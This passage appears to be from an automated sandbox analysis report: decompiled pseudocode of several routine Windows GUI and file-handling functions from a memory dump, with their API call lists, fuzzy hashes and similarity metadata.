				_t53 = GetWindow(_t113, 4);
				_t104 =  *0x48e6ec; // 0x48fbfc
				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t114 = _t101;
					while(1) {
						_t55 =  *((intOrPtr*)(_t114 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t114 = _t55;
					}
					_t112 = E0043F370(_t114);
					_v28 = _t112;
					if(_t112 == _v24) {
						goto L25;
					}
					_t12 =  &_a4; // 0x436969
					_t60 =  *((intOrPtr*)( *((intOrPtr*)( *_t12 - 0x10)) + 0x30));
					if(_t60 == 0) {
						_t18 =  &_a4; // 0x436969
						_t106 =  *0x434e14; // 0x434e60
						__eflags = E00403740( *((intOrPtr*)( *_t18 - 0x10)), _t106);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t20 =  &_a4; // 0x436969
							_v32 = E0043F370( *((intOrPtr*)( *_t20 - 0x10)));
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						_push( &_v32);
						_push(E004365DC);
						_push(GetCurrentThreadId());
						L00406DB8();
						_t126 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E004037B0(_t101, _t126);
						_t78 =  *0x48fb84; // 0x0
						_t110 =  *0x433bf0; // 0x433c3c
						if(E00403740(_t78, _t110) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t84 =  *0x48fb84; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t86 =  *0x48fb84; // 0x0
						if(E0043F370( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t116 = _t60;
					while(1) {
						_t93 =  *((intOrPtr*)(_t116 + 0x30));
						if(_t93 == 0) {
							break;
						}
						_t116 = _t93;
					}
					_v32 = E0043F370(_t116);
					goto L19;
				}
				_t117 = E00435BD0(_v24, _t102);
				if(_t117 == 0) {
					goto L25;
				} else {
					while(1) {
						_t98 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t98 == 0) {
							break;
						}
						_t117 = _t98;
					}
					_v24 = E0043F370(_t117);
					goto L6;
				}
			}

0x00436648
0x00436651
0x00436653
0x00436657
0x00436662
0x00436664
0x0043666a
0x0043666f
0x0043667a
0x004366a3
0x004366a7
0x004367d6
0x004367df
0x004367df
0x004366ad
0x004366b3
0x004366b3
0x004366b8
0x00000000
0x00000000
0x004366b1
0x004366b1
0x004366c1
0x004366c3
0x004366c9
0x00000000
0x00000000
0x004366cf
0x004366d5
0x004366da
0x004366f8
0x004366fe
0x00436709
0x0043670b
0x0043671d
0x0043671f
0x0043670d
0x0043670d
0x00436718
0x00436718
0x00436722
0x00436722
0x00436726
0x0043672c
0x00436732
0x00436738
0x00436739
0x00436743
0x00436744
0x00436749
0x0043674d
0x00000000
0x00000000
0x0043675b
0x00436766
0x0043676b
0x0043677b
0x00436780
0x00436785
0x00436792
0x004367bd
0x004367d0
0x004367d2
0x004367d2
0x00000000
0x004367d0
0x00436794
0x004367a3
0x00000000
0x00000000
0x004367a5
0x004367bb
0x00000000
0x00000000
0x00000000
0x004367bb
0x004366df
0x004366e5
0x004366e5
0x004366ea
0x00000000
0x00000000
0x004366e3
0x004366e3
0x004366f3
0x00000000
0x004366f3
0x00436684
0x00436688
0x00000000
0x0043668e
0x00436692
0x00436692
0x00436697
0x00000000
0x00000000
0x00436690
0x00436690
0x004366a0
0x00000000
0x004366a0

APIs

Part of subcall function 00436A80: WindowFromPoint.USER32(iiC,?,00000000,00436662,?,0048FB90,?), ref: 00436A86
Part of subcall function 00436A80: GetParent.USER32(00000000), ref: 00436A9D

GetWindow.USER32(00000000,00000004), ref: 0043666A
GetCurrentThreadId.KERNEL32 ref: 0043673E
7378AC10.USER32(00000000,004365DC,?,00000000,00000004,?,0048FB90,?), ref: 00436744
GetWindowRect.USER32 ref: 0043675B
IntersectRect.USER32 ref: 004367C9

Part of subcall function 00435BD0: GlobalFindAtomA.KERNEL32 ref: 00435BE4
Part of subcall function 00435BD0: GetPropA.USER32 ref: 00435BFB

Strings

iiC, xrefs: 00436767, 00436726, 0043676F, 00436760
iiC, xrefs: 00436657, 004366CF, 004366F8, 0043670D, 004366DC
<<C, xrefs: 00436785
`NC, xrefs: 004366FE

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$7378AtomCurrentFindFromGlobalIntersectParentPointPropThread
String ID: <<C$`NC$iiC$iiC
API String ID: 3502486917-2473348307
Opcode ID: 818f554653b8c48333093537ea7485411cee3a854250aefd8b3a6c87ce74fcb1
Instruction ID: e7c90c1ee9c5e868b1f9d1e5ea8ed272ea7a67a8deef7f33a43d871a993f7ec4
Opcode Fuzzy Hash: 818f554653b8c48333093537ea7485411cee3a854250aefd8b3a6c87ce74fcb1
Instruction Fuzzy Hash: 8B51A071A0010AAFCB10DF69C581A9FB7E8BF08394F519166E814EB391D738ED048B98

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA28, Relevance: 15.2, APIs: 10, Instructions: 224
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041FA28(intOrPtr* __eax, intOrPtr* __ecx, int* __edx, intOrPtr _a4, int* _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				int _v16;
				int _v20;
				int _v24;
				long _v28;
				long _v32;
				struct HDC__* _v36;
				intOrPtr* _v40;
				void* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t116;
				void* _t124;
				struct HDC__* _t191;
				int* _t196;
				intOrPtr _t204;
				intOrPtr _t208;
				intOrPtr _t209;
				intOrPtr _t210;
				int _t216;
				int* _t218;
				void* _t221;
				void* _t223;
				intOrPtr _t224;

				_t198 = __ecx;
				_t221 = _t223;
				_t224 = _t223 + 0xffffffd8;
				_v12 = __ecx;
				_t218 = __edx;
				_v8 = __eax;
				_t196 = _a8;
				if(_v12 != 0) {
					E0041FF00(_v8);
					 *[fs:eax] = _t224;
					 *((intOrPtr*)( *_v8 + 0x10))( *[fs:eax], 0x41fcce, _t221);
					_t204 =  *0x41fce0; // 0x9
					E00420318(_v8, __ecx, _t204);
					E0041FF00(E004246E8(_v12));
					_push(_t221);
					_push(0x41fca9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t224;
					_v20 = _t218[2] -  *_t218;
					_v24 = _t218[3] - _t218[1];
					_t216 = _t196[2] -  *_t196;
					_v16 = _t196[3] - _t196[1];
					if(E004247D4(_v12, _t198) != _a4) {
						_v40 = E00424120(1);
						_t198 =  *_v40;
						 *((intOrPtr*)( *_v40 + 8))();
						E00424948(_v40, _a4, __eflags);
						_t116 = E004246E8(_v40);
						_t208 =  *0x41fce4; // 0x1
						E00420318(_t116,  *_v40, _t208);
						_v36 =  *((intOrPtr*)(E004246E8(_v40) + 4));
						__eflags = 0;
						_v44 = 0;
					} else {
						_v40 = 0;
						_t191 =  *((intOrPtr*)( *_v12 + 0x68))();
						_v44 = _t191;
						_push(0);
						L00406A60();
						_v36 = _t191;
						_v44 = SelectObject(_v36, _v44);
					}
					_push(_t221);
					_push(0x41fc87);
					_push( *[fs:eax]);
					 *[fs:eax] = _t224;
					_t124 = E004246E8(_v12);
					_t209 =  *0x41fce4; // 0x1
					E00420318(_t124, _t198, _t209);
					if(E0041F8CC( *((intOrPtr*)(_v8 + 0x14))) != 1) {
						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24,  *(E004246E8(_v12) + 4),  *_t196, _t196[1], _t216, _v16, 0xcc0020);
						_v32 = SetTextColor( *(_v8 + 4), 0);
						_v28 = SetBkColor( *(_v8 + 4), 0xffffff);
						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24, _v36,  *_t196, _t196[1], _t216, _v16, 0xe20746);
						SetTextColor( *(_v8 + 4), _v32);
						SetBkColor( *(_v8 + 4), _v28);
					} else {
						E004207E0( *(_v8 + 4), _t196, _t218[1],  *_t218, _t216, _t218, _t196[1],  *_t196, _v36, _v16, _t216, _t196[1],  *_t196,  *(E004246E8(_v12) + 4), _v24, _v20);
					}
					_pop(_t210);
					 *[fs:eax] = _t210;
					_push(E0041FC8E);
					if(_v40 == 0) {
						__eflags = _v44;
						if(_v44 != 0) {
							SelectObject(_v36, _v44);
						}
						return DeleteDC(_v36);
					} else {
						return E004035B4(_v40);
					}
				}
				return __eax;
			}

0x0041fa28
0x0041fa29
0x0041fa2b
0x0041fa31
0x0041fa34
0x0041fa36
0x0041fa39
0x0041fa40
0x0041fa49
0x0041fa59
0x0041fa61
0x0041fa64
0x0041fa6d
0x0041fa7a
0x0041fa81
0x0041fa82
0x0041fa87
0x0041fa8a
0x0041fa92
0x0041fa9b
0x0041faa1
0x0041faa9
0x0041fab7
0x0041faf1
0x0041fafa
0x0041fafc
0x0041fb05
0x0041fb0d
0x0041fb12
0x0041fb18
0x0041fb28
0x0041fb2b
0x0041fb2d
0x0041fab9
0x0041fabb
0x0041fac3
0x0041fac6
0x0041fac9
0x0041facb
0x0041fad0
0x0041fae0
0x0041fae0
0x0041fb32
0x0041fb33
0x0041fb38
0x0041fb3b
0x0041fb41
0x0041fb46
0x0041fb4c
0x0041fb5e
0x0041fbd3
0x0041fbe6
0x0041fbfa
0x0041fc28
0x0041fc38
0x0041fc48
0x0041fb60
0x0041fb96
0x0041fb96
0x0041fc4f
0x0041fc52
0x0041fc55
0x0041fc5e
0x0041fc6a
0x0041fc6e
0x0041fc78
0x0041fc78
0x00000000
0x0041fc60
0x00000000
0x0041fc63
0x0041fc5e
0x0041fcdb

APIs

Part of subcall function 0041FF00: RtlEnterCriticalSection.KERNEL32(0048FA5C,00000000,0041E69E,00000000,0041E6FD), ref: 0041FF08
Part of subcall function 0041FF00: RtlLeaveCriticalSection.KERNEL32(0048FA5C,0048FA5C,00000000,0041E69E,00000000,0041E6FD), ref: 0041FF15
Part of subcall function 0041FF00: RtlEnterCriticalSection.KERNEL32(00000038,0048FA5C,0048FA5C,00000000,0041E69E,00000000,0041E6FD), ref: 0041FF1E

7378A590.GDI32(00000000), ref: 0041FACB
SelectObject.GDI32(?,?), ref: 0041FADB
StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 0041FBD3
SetTextColor.GDI32(?,00000000), ref: 0041FBE1
SetBkColor.GDI32(?,00FFFFFF), ref: 0041FBF5
StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 0041FC28
SetTextColor.GDI32(?,?), ref: 0041FC38
SetBkColor.GDI32(?,?), ref: 0041FC48
SelectObject.GDI32(?,00000000), ref: 0041FC78
DeleteDC.GDI32(?), ref: 0041FC81

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$CriticalSection$EnterObjectSelectStretchText$7378A590DeleteLeave
String ID:
API String ID: 4197212510-0
Opcode ID: 1ba593eafb9bc19b7501eee1763ea427e2a5d4d69858e207fa99d0f769cba00e
Instruction ID: 1647ed3346f09fa24bcdcb9f451b8a29068df62194e39d8e16280e0f95064956
Opcode Fuzzy Hash: 1ba593eafb9bc19b7501eee1763ea427e2a5d4d69858e207fa99d0f769cba00e
Instruction Fuzzy Hash: 1891C675A00118AFCB40EFA9C985E9EBBF8FF0D304B5544A6F908E7251D638ED41DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0043D21C, Relevance: 15.2, APIs: 10, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043D21C(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E004140D0( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0041EB0C(0x80000010));
							E00412AB0( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0041EB0C(0x80000014));
							E00412AB0( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E0041412C(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E004140D0( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E00412AB0( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E004375F8(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E00439EA4(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}

0x0043d220
0x0043d223
0x0043d225
0x0043d227
0x0043d230
0x0043d24e
0x0043d24e
0x0043d251
0x0043d259
0x0043d33e
0x0043d33e
0x0043d346
0x0043d44b
0x0043d44b
0x0043d44b
0x0043d34f
0x0043d352
0x00000000
0x00000000
0x0043d359
0x0043d35d
0x0043d35f
0x0043d367
0x0043d36c
0x0043d375
0x0043d3af
0x0043d3d2
0x0043d3dd
0x0043d3e7
0x0043d3fc
0x0043d41f
0x0043d42a
0x0043d434
0x0043d434
0x0043d439
0x0043d43a
0x0043d43a
0x0043d43a
0x00000000
0x0043d35f
0x0043d25f
0x0043d263
0x0043d26c
0x0043d270
0x0043d272
0x0043d272
0x0043d270
0x0043d27d
0x0043d283
0x0043d289
0x0043d296
0x0043d29c
0x0043d2ca
0x0043d2dc
0x0043d2e2
0x0043d2e4
0x0043d2e4
0x0043d2f0
0x0043d2fc
0x0043d30e
0x0043d31e
0x0043d329
0x0043d32e
0x0043d32e
0x0043d2dc
0x0043d334
0x0043d335
0x0043d289

APIs

RectVisible.GDI32(?,?), ref: 0043D2D5
SaveDC.GDI32(?), ref: 0043D2EB
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043D30E
RestoreDC.GDI32(?,?), ref: 0043D329
CreateSolidBrush.GDI32(00000000), ref: 0043D3AA
FrameRect.USER32 ref: 0043D3DD
DeleteObject.GDI32(?), ref: 0043D3E7
CreateSolidBrush.GDI32(00000000), ref: 0043D3F7
FrameRect.USER32 ref: 0043D42A
DeleteObject.GDI32(?), ref: 0043D434

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: 97df9983e15ef8ceda8ab448a53d1e4c662b6221a728d2c013ee12b8651ae6d4
Instruction ID: c53d7df7957da8c8db820a683e6eb8b43efda75dadf9deecc680389a81426049
Opcode Fuzzy Hash: 97df9983e15ef8ceda8ab448a53d1e4c662b6221a728d2c013ee12b8651ae6d4
Instruction Fuzzy Hash: 96518E716042409FDB14EF69D8C4B5B77E8AF89308F04445EEE89CB287D679EC44CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00402B18, Relevance: 15.1, APIs: 10, Instructions: 129
fileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00402B18(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x402a6c;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E00402AAC;
				}
				_t59[9] = E00402AF8;
				_t59[8] = E00402AA8;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E00402AA8;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x48f3e4) {
							_push(0xfffffff5);
						} else {
							_push(0xfffffff4);
						}
					} else {
						_push(0xfffffff6);
					}
					_t31 = GetStdHandle();
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E00402AAC;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}

0x00402b19
0x00402b1d
0x00402b20
0x00402b2c
0x00402b39
0x00402b3e
0x00402b43
0x00402b48
0x00402b2e
0x00402b2f
0x00402b51
0x00402b56
0x00402b5b
0x00402b31
0x00402b32
0x00000000
0x00000000
0x00402b62
0x00402b67
0x00402b6c
0x00402b6c
0x00402b71
0x00402b71
0x00402b78
0x00402b7f
0x00402b8a
0x00402c48
0x00402c4f
0x00402c56
0x00402c5f
0x00402c6b
0x00402c71
0x00402c6d
0x00402c6d
0x00402c6d
0x00402c61
0x00402c61
0x00402c61
0x00402c73
0x00402c7b
0x00000000
0x00000000
0x00402c7d
0x00000000
0x00402b90
0x00402ba0
0x00402ba8
0x00402cb6
0x00402cb6
0x00000000
0x00402cbc
0x00402bae
0x00402bb6
0x00402c7f
0x00402c85
0x00402c9e
0x00000000
0x00402c9e
0x00402c89
0x00402c90
0x00402ca4
0x00402ca9
0x00000000
0x00402caf
0x00402c95
0x00402c97
0x00402c97
0x00000000
0x00402c95
0x00402bbc
0x00402bc9
0x00402bca
0x00000000
0x00000000
0x00402bd0
0x00402bd5
0x00402bd7
0x00402bd7
0x00402be6
0x00000000
0x00402bec
0x00402c01
0x00402c06
0x00402c08
0x00000000
0x00000000
0x00402c0e
0x00402c10
0x00402c1c
0x00402c30
0x00000000
0x00402c40
0x00000000
0x00402c40
0x00402c30
0x00402c1e
0x00402c1e
0x00000000
0x00402c10
0x00402be6

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BA0
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BC4
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BE0
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402C01
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402C2A
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402C38
GetStdHandle.KERNEL32(000000F5), ref: 00402C73
GetFileType.KERNEL32(?,000000F5), ref: 00402C89
CloseHandle.KERNEL32(?,?,000000F5), ref: 00402CA4
GetLastError.KERNEL32(000000F5), ref: 00402CBC

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: 80a050c019947318a92831656a408fafd0f578acc5d5c69c0c1d70747e811a6c
Instruction ID: 975840f4674e4f171413811f9c4b8c0f4834828094a83cfad36f4eac295fad15
Opcode Fuzzy Hash: 80a050c019947318a92831656a408fafd0f578acc5d5c69c0c1d70747e811a6c
Instruction Fuzzy Hash: AB41A170108700AAF7309F24CB0DB2B76E5AB41754F208A3FE596B66E0E7FDA841874D

Uniqueness

Uniqueness Score: -1.00%

Function 004545F4, Relevance: 15.1, APIs: 10, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004545F4(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E0043F370( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}

0x004545fb
0x00454605
0x0045460e
0x00454618
0x00454621
0x0045462b
0x00454644
0x00454653
0x0045465d
0x0045466a
0x00454677
0x00454684
0x00454691
0x0045469e
0x00000000
0x004546ab
0x004546bf
0x004546c9
0x004546c9
0x004546d1
0x004546db
0x00000000
0x004546e5
0x004546db
0x0045462b
0x00454618
0x004546ec

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 0045463F
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 0045465D
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045466A
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00454677
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00454684
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00454691
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0045469E
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004546AB
EnableMenuItem.USER32 ref: 004546C9
EnableMenuItem.USER32 ref: 004546E5

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
